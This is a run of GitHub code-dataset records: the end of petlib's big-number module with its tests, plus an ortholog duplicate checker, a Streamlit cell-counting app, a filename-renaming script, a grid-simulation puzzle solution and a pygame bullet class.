one100 = Bn(100)\n >>> two100 = Bn(200)\n >>> two100.mod(one100) # Function syntax\n 0\n >>> two100 % one100 # Operator syntax\n 0\n\n\n \"\"\"\n return self.__mod__(other)\n\n def __rmod__(self, other):\n return Bn(other).__mod__(self)\n\n def __mod__(self, other):\n\n try:\n rem = Bn()\n\n local_ctx = get_ctx()\n err = _C.BN_nnmod(rem.bn, self.bn, other.bn, local_ctx.bnctx)\n\n if __debug__:\n _check(err)\n return rem\n except AttributeError:\n return self.__mod__(Bn.from_num(other))\n\n def __rtruediv__(self, other):\n return Bn(other).__truediv__(self)\n\n def __truediv__(self, other):\n return self.__div__(other)\n\n def __rfloordiv__(self, other):\n return Bn(other).__floordiv__(self)\n\n def __floordiv__(self, other):\n return self.__div__(other)\n\n def __rpow__(self, other):\n return Bn(other).__pow__(self)\n\n def pow(self, other, modulo=None, ctx=None):\n \"\"\"Returns the number raised to the power other optionally modulo a third number.\n Synonym with pow(self, other, modulo).\n\n Example:\n\n >>> one100 = Bn(100)\n >>> one100.pow(2) # Function syntax\n 10000\n >>> one100 ** 2 # Operator syntax\n 10000\n >>> one100.pow(2, 3) # Modular exponentiation\n 1\n\n \"\"\"\n if modulo:\n return self.__pow__(other, modulo, ctx)\n else:\n return self ** other\n\n def __pow__(self, other, modulo=None, ctx=None):\n\n try:\n res = Bn()\n\n if ctx is None:\n ctx = BnCtx()\n\n if modulo is None:\n _check(_C.BN_exp(res.bn, self.bn, other.bn, ctx.bnctx))\n else:\n _check(\n _C.BN_mod_exp(\n res.bn,\n self.bn,\n other.bn,\n modulo.bn,\n ctx.bnctx))\n\n return res\n except BaseException:\n other = Bn.from_num(other)\n if modulo is not None:\n modulo = Bn.from_num(modulo)\n return self.__pow__(other, modulo, ctx)\n\n def is_prime(self):\n \"\"\"Returns True if the number is prime, with negligible prob. 
of error.\"\"\"\n\n res = int(_C.BN_is_prime_ex(self.bn, 0, get_ctx().bnctx, _FFI.NULL))\n if res == 0:\n return False\n if res == 1:\n return True\n raise Exception(\"Primality test failure %s\" % int(res))\n\n def is_odd(self):\n \"\"\"Returns True if the number is odd.\"\"\"\n\n return bool(_C.bn_is_odd(self.bn))\n\n def is_bit_set(self, n):\n \"\"\"Returns True if the nth bit is set\"\"\"\n return int(_C.BN_is_bit_set(self.bn, n))\n\n def num_bits(self):\n \"\"\"Returns the number of bits representing this Big Number\"\"\"\n return int(_C.BN_num_bits(self.bn))\n\n # Implement negative\n def __neg__(self):\n # pylint: disable=protected-access\n zero = Bn(0)\n ret = copy(self)\n if ret >= zero:\n ret._set_neg(1)\n else:\n ret._set_neg(0)\n return ret\n\n def __hash__(self):\n return int(self).__hash__()\n\n# Unsupported\n# object.__lshift__(self, other)\n# object.__rshift__(self, other)\n# object.__and__(self, other)\n# object.__xor__(self, other)\n# object.__or__(self, other)\n\n# ---------- Tests ------------\n\n\ndef test_bn_constructors():\n assert Bn.from_decimal(\"100\") == 100\n assert Bn.from_decimal(\"-100\") == -100\n\n with pytest.raises(Exception) as excinfo:\n Bn.from_decimal(\"100ABC\")\n assert 'BN Error' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n Bn.from_hex(\"100ABCZ\")\n assert 'BN Error' in str(excinfo.value)\n\n assert Bn.from_hex(Bn(-100).hex()) == -100\n assert Bn(15).hex() == Bn(15).hex()\n\n with pytest.raises(Exception) as excinfo:\n Bn(-100).binary()\n assert 'negative' in str(excinfo.value)\n\n #assert Bn.from_binary(Bn(-100).binary()) == 100\n assert Bn.from_binary(Bn(100).binary()) == Bn(100)\n assert Bn.from_binary(Bn(100).binary()) == 100\n\n with pytest.raises(Exception) as excinfo:\n s = 10**10\n Bn(s)\n assert 'does not fit' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n _check(False)\n assert 'BN' in str(excinfo.value)\n\n #assert Bn.from_binary(Bn(-100).binary()) != Bn(50)\n assert int(Bn(-100)) == -100\n\n assert repr(Bn(5)) == Bn(5).repr() == \"5\"\n assert range(10)[Bn(4)] == 4\n\n d = {Bn(5): 5, Bn(6): 6}\n assert Bn(5) in d\n\n\ndef test_bn_prime():\n p = Bn.get_prime(128)\n assert p > Bn(0)\n assert p.is_prime()\n assert not Bn(16).is_prime()\n assert p.num_bits() > 127\n\n\ndef test_bn_arithmetic():\n assert (Bn(1) + Bn(1) == Bn(2))\n assert (Bn(1).int_add(Bn(1)) == Bn(2))\n\n assert (Bn(1) + 1 == Bn(2))\n # assert (1 + Bn(1) == Bn(2))\n\n assert (Bn(1) + Bn(-1) == Bn(0))\n assert (Bn(10) + Bn(10) == Bn(20))\n assert (Bn(-1) * Bn(-1) == Bn(1))\n assert (Bn(-1).int_mul(Bn(-1)) == Bn(1))\n\n assert (Bn(10) * Bn(10) == Bn(100))\n assert (Bn(10) - Bn(10) == Bn(0))\n assert (Bn(10) - Bn(100) == Bn(-90))\n assert (Bn(10) + (-Bn(10)) == Bn(0))\n s = -Bn(100)\n assert (Bn(10) + s == Bn(-90))\n assert (Bn(10) - (-Bn(10)) == Bn(20))\n assert -Bn(-10) == 10\n assert Bn(-10).int_neg() == 10\n\n assert divmod(Bn(10), Bn(3)) == (Bn(3), Bn(1))\n assert Bn(10).divmod(Bn(3)) == (Bn(3), Bn(1))\n\n assert Bn(10) / Bn(3) == Bn(3)\n assert Bn(10) // Bn(3) == Bn(3)\n assert Bn(10).int_div(Bn(3)) == Bn(3)\n\n assert Bn(10) % Bn(3) == Bn(1)\n assert Bn(10).mod(Bn(3)) == Bn(1)\n\n assert Bn(2) ** Bn(8) == Bn(2 ** 8)\n assert pow(Bn(2), Bn(8), Bn(27)) == Bn(2 ** 8 % 27)\n\n pow(Bn(10), Bn(10)).binary()\n\n assert pow(Bn(2), 8, 27) == 2 ** 8 % 27\n\n assert Bn(3).mod_inverse(16) == 11\n\n with pytest.raises(Exception) as excinfo:\n Bn(3).mod_inverse(0)\n print(\"Got inverse\")\n assert 'No inverse' in str(excinfo.value)\n\n 
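# quick cross-check of the inverse computed above: 3 * 11 = 33 = 2 * 16 + 1, so 3 and 11\n # are mutual inverses mod 16 (relies on the int-coercion path of mod_mul shown earlier)\n assert Bn(3).mod_mul(11, 16) == 1\n\n 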
with pytest.raises(Exception) as excinfo:\n x = Bn(0).mod_inverse(Bn(13))\n print(\"!!! Got inverse\", x)\n assert 'No inverse' in str(excinfo.value)\n\n # with pytest.raises(Exception) as excinfo:\n # x = Bn(0).mod_inverse(Bn(13))\n # print(\"Got inverse\", x)\n #assert 'No inverse' in str(excinfo.value)\n\n assert Bn(10).mod_add(10, 15) == (10 + 10) % 15\n assert Bn(10).mod_sub(100, 15) == (10 - 100) % 15\n assert Bn(10).mod_mul(10, 15) == (10 * 10) % 15\n assert Bn(-1).bool()\n\n\ndef test_bn_right_arithmetic():\n assert (1 + Bn(1) == Bn(2))\n\n assert (-1 * Bn(-1) == Bn(1))\n\n assert (10 * Bn(10) == Bn(100))\n assert (10 - Bn(10) == Bn(0))\n assert (10 - Bn(100) == Bn(-90))\n assert (10 + (-Bn(10)) == Bn(0))\n s = -Bn(100)\n assert (10 + s == Bn(-90))\n assert (10 - (-Bn(10)) == Bn(20))\n\n assert divmod(10, Bn(3)) == (Bn(3), Bn(1))\n\n assert 10 / Bn(3) == Bn(3)\n assert 10 // Bn(3) == Bn(3)\n\n assert 10 % Bn(3) == Bn(1)\n assert 2 ** Bn(8) == Bn(2 ** 8)\n\n assert 100 == Bn(100)\n\n pow(10, Bn(10))\n\n\ndef test_bn_allocate():\n # Test allocation\n n0 = Bn(10)\n assert True\n\n assert str(Bn()) == \"0\"\n assert str(Bn(1)) == \"1\"\n assert str(Bn(-1)) == \"-1\"\n\n assert Bn(15).hex() == \"0F\"\n assert Bn(-15).hex() == \"-0F\"\n\n assert int(Bn(5)) == 5\n assert Bn(5).int() == 5\n\n assert 0 <= Bn(15).random() < 15\n\n # Test copy\n o0 = copy(n0)\n o1 = deepcopy(n0)\n\n assert o0 == n0\n assert o1 == n0\n\n # Test nonzero\n assert not Bn()\n assert not Bn(0)\n assert Bn(1)\n assert Bn(100)\n\n\ndef test_bn_cmp():\n assert Bn(1) < Bn(2)\n assert Bn(1) <= Bn(2)\n assert Bn(2) <= Bn(2)\n assert Bn(2) == Bn(2)\n assert not Bn(2) == None\n assert Bn(2) <= Bn(3)\n assert Bn(2) < Bn(3)\n\n\ndef test_extras():\n two = Bn(2)\n two2 = two.copy()\n assert two == two2\n\n\ndef test_odd():\n assert Bn(1).is_odd()\n assert Bn(1).is_bit_set(0)\n assert not Bn(1).is_bit_set(1)\n\n assert Bn(3).is_odd()\n assert Bn(3).is_bit_set(0)\n assert Bn(3).is_bit_set(1)\n\n assert not Bn(0).is_odd()\n assert not Bn(2).is_odd()\n\n assert Bn(100).is_bit_set(Bn(100).num_bits() - 1)\n\n\ndef test_check():\n with pytest.raises(Exception) as excinfo:\n _check(False)\n assert 'BN' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n _check(-1)\n assert 'BN' in str(excinfo.value)\n\n with pytest.raises(Exception) as excinfo:\n _check(0)\n assert 'BN' in str(excinfo.value)\n\n\ndef test_timing_exp():\n p = Bn.from_decimal(\"158261031819091141711717027498980088325079888681498417129323009913367867128038610210948802263526234270043507882496188624614467036250990588401775690578042934008692254417273606807265961724843618743242066301529332478013432957153823449143202719186309012133210922613102725038632605463022887306439116579645787938883\")\n psmall = Bn.from_decimal(\n \"90123082853250477832412338337738008391831682960497136029451532639902615425459\")\n\n xs = [p.random() for _ in range(1000)]\n ys = [p.random() for _ in range(1000)]\n\n import time\n\n print()\n t0 = time.time()\n X = [xi.mod_mul(yi, psmall) for (xi, yi) in zip(xs, ys)]\n t1 = time.time()\n print(\"Mod_mul time: %.2fms\" % ((t1 - t0) * 1000.0 / 1000.0))\n\n t0 = time.time()\n X = [xi.pow(yi, p) for (xi, yi) in zip(xs, ys)]\n t1 = time.time()\n print(\" Pow time: %.2fms\" % ((t1 - t0) * 1000.0 / 1000.0))\n\n ctx = BnCtx()\n t0 = time.time()\n X = [xi.pow(yi, p, ctx) for (xi, yi) in zip(xs, ys)]\n t1 = time.time()\n print(\"Pow ctx time: %.2fms\" % ((t1 - t0) * 1000.0 / 
1000.0))\n","repo_name":"gdanezis/petlib","sub_path":"petlib/bn.py","file_name":"bn.py","file_ext":"py","file_size_in_byte":27519,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"}
+{"seq_id":"40145579227","text":"#!/bin/python\n\"\"\"\n\nTitle: check_OG_duplicates.py\nDate: 2022-03-02\nAuthor: Virág Varga\n\nDescription:\n\tThis program checks a file to see whether elements of the first column\n\t\t(Pythonic index 0; must be named \"Query\") are repeated.\n\tIt was written to determine whether orthologous clustering programs were\n\t\tclustering proteins into more than one orthologous group.\n\nList of functions:\n\tNo functions are defined in this script.\n\nList of standard and non-standard modules used:\n\tsys\n\tos\n\tpandas\n\nProcedure:\n\t1. Loading required modules; defining inputs and outputs as command line\n\t\targuments.\n\t2. Using Pandas to import the contents of the ortholog_groups.tsv file into a\n\t\tdataframe.\n\t3. Checking the query column for duplicates and, if any exist, writing them\n\t\tout to a _DUPLICATES.txt file.\n\nKnown bugs and limitations:\n\t- There is no quality-checking integrated into the code.\n\t- This program requires the input of a file with query IDs in the first column.\n\nUsage\n\t./check_OG_duplicates.py input_db\n\tOR\n\tpython check_OG_duplicates.py input_db\n\nThis script was written for Python 3.8.12, in Spyder 5.1.5.\n\n\"\"\"\n\n\n#Part 1: Assign command-line arguments, import modules\n\n#import necessary modules\nimport sys #allows assignment of command line arguments\nimport os #allow access to computer files\nimport pandas as pd #facilitates manipulation of dataframes in Python\n\n#assign command line arguments; load input and output files\ninput_db = sys.argv[1]\n#input_db = \"Broccoli_OGs_parsed.txt\"\n#input_db = \"OF_OGs_parsed.txt\"\n#input_db = \"SP_OGs_parsed.txt\"\n#input_db = \"PO_OGs_parsed.txt\"\n#input_db = \"encoding_summary_ref.txt\"\n\n#used the above to check that the query ids themselves weren't replicated\n\n\n#Part 2: Check for duplicates & report results\n\n#import input database into a Pandas dataframe\northo_df = pd.read_csv(input_db, sep = '\\t', header = 0)\n\n#send query column to list\nquery_list = ortho_df.iloc[:, 0].to_list()\n\n\n#check if list members are entirely unique\nif(len(set(query_list)) == len(query_list)):\n\tprint(input_db + \"___ results DO NOT have duplicates among the queries!\")\nelse:\n\tprint(input_db + \" results HAVE duplicates among the queries!\")\n\tcopy_ortho_df = ortho_df.iloc[:, [0, -1]].copy()\n\t#the script works up until here\n\t#I'm able to make a dataframe with the line above that includes only the OG numbers & query IDs\n\tduplicate_df = pd.concat(g for _, g in copy_ortho_df.groupby(\"Query\") if len(g) > 1)\n\tbase = os.path.basename(input_db)\n\tout_full = os.path.splitext(base)[0]\n\toutput_file = out_full + \"_DUPLICATES.txt\"\n\tduplicate_df.to_csv(output_file, sep='\\t', index=False)\n","repo_name":"V-Varga/TrichoCompare","sub_path":"OG_Comparisons/check_OG_duplicates.py","file_name":"check_OG_duplicates.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"15611630685","text":"import os\n\nimport streamlit as st\nimport cv2\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom model.resunet import *\nimport torchvision.transforms as T\nfrom utils import to_Tensor\nimport io\nfrom skimage.feature import peak_local_max\nfrom skimage.morphology import remove_small_holes, remove_small_objects, 
label\nfrom skimage.segmentation import watershed\nfrom scipy import ndimage\nfrom math import hypot\nimport random\nimport PIL\nfrom streamlit.runtime.legacy_caching import clear_cache\n\n\nfrom src.utils import load_model as load_model_ckpt  # aliased so the cached load_model defined below does not shadow it\n\nfrom src.utils import *\nimport matplotlib\nmatplotlib.use('TkAgg')\n\n@st.cache()\ndef load_model(path='../pre_trained_models', n_features_start=16, n_out=1, fine_tuning=False,\n unfreezed_layers=1, device='cpu', model_to_load='yellow'):\n \"\"\"Retrieves the trained model and maps it to the CPU by default,\n can also specify GPU here.\"\"\"\n st.session_state.result = 0\n st.session_state.post_processing = 0\n if model_to_load == 'green':\n path = os.path.join(path, \"c-resunet_g.h5\")\n elif model_to_load == 'yellow':\n path = os.path.join(path, \"c-resunet_y.h5\")\n\n if fine_tuning:\n model = load_model_ckpt(resume_path=path, device=device, n_features_start=n_features_start, n_out=n_out,\n fine_tuning=fine_tuning, unfreezed_layers=unfreezed_layers).to(device)\n else:\n model = nn.DataParallel(c_resunet(arch='c-ResUnet', n_features_start=n_features_start, n_out=1, c0=True))\n try:\n if device == 'cpu':\n model.load_state_dict(torch.load(path, map_location=torch.device('cpu'))['model_state_dict'])\n else:\n model.load_state_dict(torch.load(path)['model_state_dict'])\n except:\n if device == 'cpu':\n model.load_state_dict(torch.load(path, map_location=torch.device('cpu')))\n else:\n model.load_state_dict(torch.load(path))\n\n return model\n\n@st.cache(allow_output_mutation=True)\ndef predict(model, images, device='cpu', transform=None):\n model.eval()\n preds = []\n\n if isinstance(images, list):\n for img in images:\n input_tensor = transform(img)[:3, :,:] # transforming from pil to tensor already have value between 0 and 1\n # (3, h, w) images\n input_batch = input_tensor.unsqueeze(0).to(device) # batch the image\n # TODO: when multiple images come, pack them in a list and iterate to\n # TODO: transform to tensor, or directly transform all the images in the list\n with torch.no_grad():\n preds.append(model(input_batch).detach().cpu()) # (1, h, w) size images # TODO: make for loop when multiple files\n if device == 'cuda':\n torch.cuda.empty_cache()\n else:\n input_tensor = transform(images)[:3, :,:] # transforming from pil to tensor already have value between 0 and 1\n # (3, h, w) images\n input_batch = input_tensor.unsqueeze(0).to(device) # batch the image\n # TODO: when multiple images come, pack them in a list and iterate to\n # TODO: transform to tensor, or directly transform all the images in the list\n with torch.no_grad():\n preds.append(model(input_batch).detach().cpu()) # (1, h, w) size images # TODO: make for loop when multiple files\n if device == 'cuda':\n torch.cuda.empty_cache()\n\n return preds\n@st.cache(allow_output_mutation=True)\ndef binarize(preds, th=0.7):\n\n if isinstance(preds, list):\n preds_t = [(np.squeeze(x[0:1, :, :]) > th) for x in preds]\n else:\n preds_t = (np.squeeze(preds[0:1, :, :]) > th)\n\n return preds_t\n\n@st.cache\ndef make_post_processing(preds, area_threshold=6, min_obj_size=2, max_dist=3, foot=4):\n '''\n preds: array of tensor (ch, h, w)\n targets: array of tensor (ch, h, w)\n return:\n processed_preds: array of tensor (ch, h, w)\n targets: array of tensor (ch, h, w)\n '''\n\n if len(preds[0].shape) > 2:\n ix = np.argmin(preds[0].shape)\n if ix != 0:\n raise Exception(\"channels are not on the first dimension \\\n or are more than the spatial dimension\")\n\n # Find object in predicted image\n 
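# descriptive note on the steps below: each binarized mask is labelled, small holes and\n # specks are removed, then a distance transform + local maxima + watershed split touching cells\n 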
processed_preds = []\n for p in preds:\n\n labels_pred, nlabels_pred = ndimage.label(p)\n processed = remove_small_holes(labels_pred, area_threshold=area_threshold, connectivity=1,\n in_place=False)\n processed = remove_small_objects(processed, min_size=min_obj_size,\n connectivity=1, in_place=False)\n labels_bool = processed.astype(bool)\n distance = ndimage.distance_transform_edt(processed)\n\n maxi = ndimage.maximum_filter(distance, size=max_dist, mode='constant')\n local_maxi = peak_local_max(np.squeeze(maxi), indices=False, footprint=np.ones((foot, foot)),\n exclude_border=False,\n labels=np.squeeze(labels_bool))\n local_maxi = remove_small_objects(\n local_maxi, min_size=min_obj_size, connectivity=1, in_place=False)\n markers = ndimage.label(local_maxi)[0]\n labels = watershed(-distance, markers, mask=np.squeeze(labels_bool),\n compactness=1, watershed_line=True)\n processed_preds.append(labels.astype(\"uint8\")*255)\n\n return processed_preds\n\n\n@st.cache(allow_output_mutation=True)\ndef load_image(uploaded_file):\n print('uploading images')\n st.session_state.result = 0 # TODO: if the new images are a subset of the previous one, keep the st.session_state_result = 1\n st.session_state.post_processing = 0\n\n if isinstance(uploaded_file, list):\n if len(uploaded_file) == 0:\n filenames_to_read = os.listdir('../images')\n images = []\n for fl in filenames_to_read:\n #st.image('../images/{}'.format(fl))\n image_data = Image.open('../images/{}'.format(fl))\n img_byte_arr = io.BytesIO()\n image_data.save(img_byte_arr, format='PNG') # TODO: switch to tiff format\n image_data = img_byte_arr.getvalue()\n images.append(Image.open(io.BytesIO(image_data)))\n return images, filenames_to_read\n else:\n images = []\n filenames_to_read = []\n for img in uploaded_file:\n image_data = img.getvalue()\n filenames_to_read.append(img.name)\n images.append(Image.open(io.BytesIO(image_data)))\n return images, filenames_to_read\n ### When accept_multiple file is false:\n else:\n if uploaded_file is not None:\n image_data = uploaded_file.getvalue()\n st.image(image_data)\n return Image.open(io.BytesIO(image_data)), uploaded_file.name\n else:\n st.image('../images/demo.tiff')\n image_data = Image.open('../images/demo.tiff')\n img_byte_arr = io.BytesIO()\n image_data.save(img_byte_arr, format='PNG') # TODO: switch to tiff format\n image_data = img_byte_arr.getvalue()\n return Image.open(io.BytesIO(image_data)), 'demo.tiff'\n\n\ndef display_images(images, filenames):\n sorted_images = images\n sorted_filenames = filenames\n\n\n if len(sorted_images) > 5:\n item_to_display = 5\n else:\n item_to_display = len(images)\n\n ncol = st.sidebar.number_input(\"how many loaded items to display\", 1, len(images), item_to_display)\n shuffle = st.sidebar.number_input(\"display in random order\", 0, 1, 0)\n\n if shuffle:\n zipped = list(zip(images, filenames))\n random.shuffle(zipped)\n images, filenames = zip(*zipped)\n cols = st.columns(ncol)\n idxs = list(range(0, len(images)))\n for i, x in enumerate(cols):\n # x.selectbox(f\"Input # {filenames[i]}\", idxs, key=i)\n cols[i].image(images[i])\n else:\n cols = st.columns(ncol)\n idxs = list(range(0, len(images)))\n for i, x in enumerate(cols):\n # x.selectbox(f\"Input # {filenames[i]}\", idxs, key=i)\n cols[i].image(images[i])\n\ndef computing_counts(images, preds):\n # extract predicted objects and counts,\n if isinstance(preds, list):\n counts = []\n bboxes_images = []\n for p, i in zip(preds, images):\n i_draw = ImageDraw.Draw(i)\n\n pred_label, pred_count = 
ndimage.label(p)\n pred_objs = ndimage.find_objects(pred_label)\n\n # compute centers of predicted objects\n #pred_centers = []\n for ob in pred_objs:\n #pred_centers.append(((int((ob[0].stop - ob[0].start) / 2) + ob[0].start),\n # (int((ob[1].stop - ob[1].start) / 2) + ob[1].start)))\n #cv2.rectangle(i_cv, (ob[1].start, ob[0].start), (ob[1].stop, ob[0].stop), (0, 255, 0), 4)\n i_draw.line( ((ob[1].start -20, ob[0].start -20),\n (ob[1].stop + 20, ob[0].start-20),\n (ob[1].stop +20, ob[0].stop+20),\n (ob[1].start-20, ob[0].stop+20),\n (ob[1].start-20, ob[0].start-20)), fill=\"green\", width=9)\n\n #i_draw.rectangle([(ob[1].start, ob[0].start), (ob[1].stop, ob[0].stop)], fill=None, outline='green')\n\n bboxes_images.append(i)\n counts.append(pred_count)\n return bboxes_images, counts\n\n else:\n pred_label, pred_count = ndimage.label(preds)\n pred_objs = ndimage.find_objects(pred_label)\n\n # compute centers of predicted objects\n pred_centers = []\n for ob in pred_objs:\n pred_centers.append(((int((ob[0].stop - ob[0].start) / 2) + ob[0].start),\n (int((ob[1].stop - ob[1].start) / 2) + ob[1].start)))\n\n cv2.rectangle(images, (ob[1].start, ob[0].start), (ob[1].stop, ob[0].stop), (0, 255, 0), 4)\n\n return images\n\n\ndef main():\n cuda = torch.cuda.is_available()\n device = \"cuda\" if cuda else \"cpu\"\n to_PIL = T.ToPILImage()\n\n if 'result' not in st.session_state:\n st.session_state.result = 0\n\n if 'post_processing' not in st.session_state:\n st.session_state.post_processing = 0\n\n if 'batch_counts' not in st.session_state:\n st.session_state.batch_counts = 0\n\n #check_model = st.checkbox('select model and training settings')\n uploaded_file = st.file_uploader(label='Pick an image to test', accept_multiple_files = True)\n #if check_model:\n # model_to_load = st.selectbox('which model to load', np.array(['green', 'yellow']))\n # model_training_status = st.selectbox('which model to load', np.array(['pre-trained']))\n #else:\n # model_to_load = 'green'\n # model_training_status = 'pre-training'\n\n st.info(\"Select the model to load:\")\n st.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n model_to_load = st.selectbox(\"\", np.array(['green', 'yellow']))\n #st.multiselect('which model to load', np.array([]))\n\n #cached\n model = load_model(device=device, model_to_load=model_to_load)\n #cached\n images, filenames = load_image(uploaded_file)\n #not cached\n display_images(images, filenames)\n\n post_processing_title = '
<b>Post-processing parameters</b>
'\n st.sidebar.markdown(post_processing_title, unsafe_allow_html=True)\n\n result = st.button('Make Prediction', key='make_prediction')\n if result:\n st.session_state.result = 1\n\n\n if st.session_state.result:\n confidence_threshold = st.slider(\"Confidence threshold\", 0.0, 1.0, 0.6, 0.05)\n\n preds = predict(model, images, device, transform=to_Tensor)\n preds_th = binarize(preds, th=confidence_threshold)\n preds_to_PIL = [to_PIL(x.int()*255) for x in preds_th]\n preds_to_PIL_converted = []\n\n images_boxes = []\n for i in images:\n images_boxes.append(i.copy())\n\n bboxes_pil, counts = computing_counts(images_boxes, preds_th)\n\n for i, p, c in zip(bboxes_pil, preds_to_PIL, counts):#TODO: make a function\n p = p.convert('L')\n preds_to_PIL_converted.append(p)\n\n col1, col2 = st.columns(2)\n with col1:\n st.image(i, use_column_width=True)\n st.caption('cells detected without post processing: {}'.format(c))\n #post_processing_title = '
<b>Post-processing parameters</b>
'\n #st.sidebar.markdown(post_processing, unsafe_allow_html=True)\n with col2:\n st.image(p, use_column_width=True)\n\n post_processing = st.button('Post-processing')\n if post_processing:\n st.session_state.post_processing = 1\n\n #reset = st.sidebar.button('reset value', key='reset_value')\n #if reset:\n # st.session_state.reset = 1\n\n if st.session_state.post_processing:\n if model_to_load == 'yellow':\n remove_small_object = st.sidebar.slider(\"small object size, suggested {}\".format(200), 0, 1000, 200, 1)\n area_threshold = st.sidebar.slider(\"minimum area to keep, suggested {}\".format(600), 0, 1000, 600, 1)\n max_dist = st.sidebar.slider(\"max_dist to define different object, suggested {}\".format(300), 0, 100, 30, 1)\n foot = st.sidebar.slider(\"foot, suggested {}\".format(400), 0, 100, 40, 1)\n elif model_to_load == 'green':\n remove_small_object = st.sidebar.slider(\"small object size to remove, suggested {}\".format(2), 0, 100, 2, 1)\n area_threshold = st.sidebar.slider(\"minimum area to keep, suggested {}\".format(6), 0, 100, 6, 1)\n max_dist = st.sidebar.slider(\"max_dist to define different object, suggested {}\".format(3), 0, 100, 3, 1)\n foot = st.sidebar.slider(\"foot, suggested {}\".format(4), 0, 100, 4, 1)\n\n if st.session_state.post_processing:\n post_processed = make_post_processing(preds_th, area_threshold=area_threshold\n , min_obj_size=remove_small_object , max_dist=max_dist, foot=foot)\n post_processed_to_PIL = [to_PIL(x) for x in post_processed]\n\n images_boxes_proc = []\n for i in images:\n images_boxes_proc.append(i.copy())\n print('postprocessing', st.session_state.post_processing)\n if st.session_state.post_processing:\n bboxes_pil_proc, counts_proc = computing_counts(images_boxes_proc, post_processed)\n\n for i, p, pp, c, cp in zip(images, bboxes_pil, bboxes_pil_proc, counts, counts_proc):#TODO: make a function\n col1, col2 = st.columns(2)\n\n with col1:\n st.image(p, use_column_width=True)\n st.caption('cells detected without post processing: {}'.format(c))\n\n with col2:\n st.image(pp, use_column_width=True)\n st.caption('cells detected with post_processing: {}'.format(cp))\n\n batch_counts = st.button('Run batch analysis TO IMPLEMENT', key='batch_analysis')\n if batch_counts:\n st.session_state.batch_counts = 1\n if st.session_state.batch_counts == 1:\n st.write('TO IMPLEMENT')\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"robomorelli/cells_counting_app","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20978586873","text":"import os\ndef rename_files():\n #get file names from folder\n file_list = os.listdir(r\"/Users/vypatz/Desktop/alphabet1\")\n #print(file_list)\n saved_path = os.getcwd()\n print(\"cwd is \" + saved_path)\n os.chdir(r\"/Users/vypatz/Desktop/alphabet1\")\n\n #for each file, rename filename\n remove_these = dict((ord(char), None) for char in '0123456789')\n for file_name in file_list:\n os.rename(file_name, file_name.translate(remove_these))\n os.chdir(saved_path)\n\nrename_files()\n \n","repo_name":"vyyyy/Practice-Programming","sub_path":"udacity-python-course/rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75197640373","text":"import sys\nsys.setrecursionlimit(10 ** 9)\ninput = sys.stdin.readline\nn, m = map(int, 
input().split())\ngrid = list(list(map(int, input().split())) for _ in range(n))\nyear = 0\nice_cnt = 0\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\ndef melting_cnt(x, y):\n cnt = 0\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if grid[nx][ny] == 0:\n cnt += 1\n return cnt\n\ndef count_ice(x, y, temp):\n # mark this cell as visited, then flood-fill its in-bounds neighbours\n if x < 0 or x >= n or y < 0 or y >= m:\n return\n temp[x][y] = 0\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m and temp[nx][ny] != 0:\n count_ice(nx, ny, temp)\n\nall_melted = False\nwhile ice_cnt < 2:\n year += 1\n graph = []\n for x in range(n):\n for y in range(m):\n if grid[x][y] != 0:\n graph.append([x, y, melting_cnt(x, y)])\n\n for a in range(len(graph)):\n x = graph[a][0]\n y = graph[a][1]\n grid[x][y] -= graph[a][2]\n if grid[x][y] < 0:\n grid[x][y] = 0\n\n # count connected chunks on a copy so the flood fill does not erase the real grid\n temp = [row[:] for row in grid]\n\n ice_cnt = 0\n for x in range(n):\n for y in range(m):\n if temp[x][y] != 0:\n ice_cnt += 1\n count_ice(x, y, temp)\n\n if ice_cnt == 0:\n # the ice melted away completely before splitting in two\n all_melted = True\n break\n\nprint(0 if all_melted else year)","repo_name":"keeeeeey/baekjoon_algorithm","sub_path":"구현 문제/빙산.py","file_name":"빙산.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12686061910","text":"import numpy as np\nimport pygame as pg\nfrom enemy import Enemy\n\nclass Enemy_bullet:\n def __init__( self, screen, enemy: Enemy ):\n self.position = np.array( [ enemy.center[ 0 ], enemy.center[ 1 ] ] )\n self.img = pg.transform.rotate(\n pg.transform.scale(\n pg.image.load( 'assets/bullet.png' ), ( 10, 10 ) ),\n enemy.draw_angle )\n self.screen = screen\n self.delta = np.copy( enemy.delta ) / np.linalg.norm( enemy.delta )\n self.increment = 1.5\n\n def draw( self ):\n self.screen.blit( self.img, self.position )\n # pg.draw.rect( self.screen, [255,0,0], self.get_rect() )\n\n def get_rect( self ):\n return pg.Rect( self.position[ 0 ], self.position[ 1 ], 5, 5 )\n\n","repo_name":"PrinceOfCzechia/Dogfight","sub_path":"enemy_bullet.py","file_name":"enemy_bullet.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
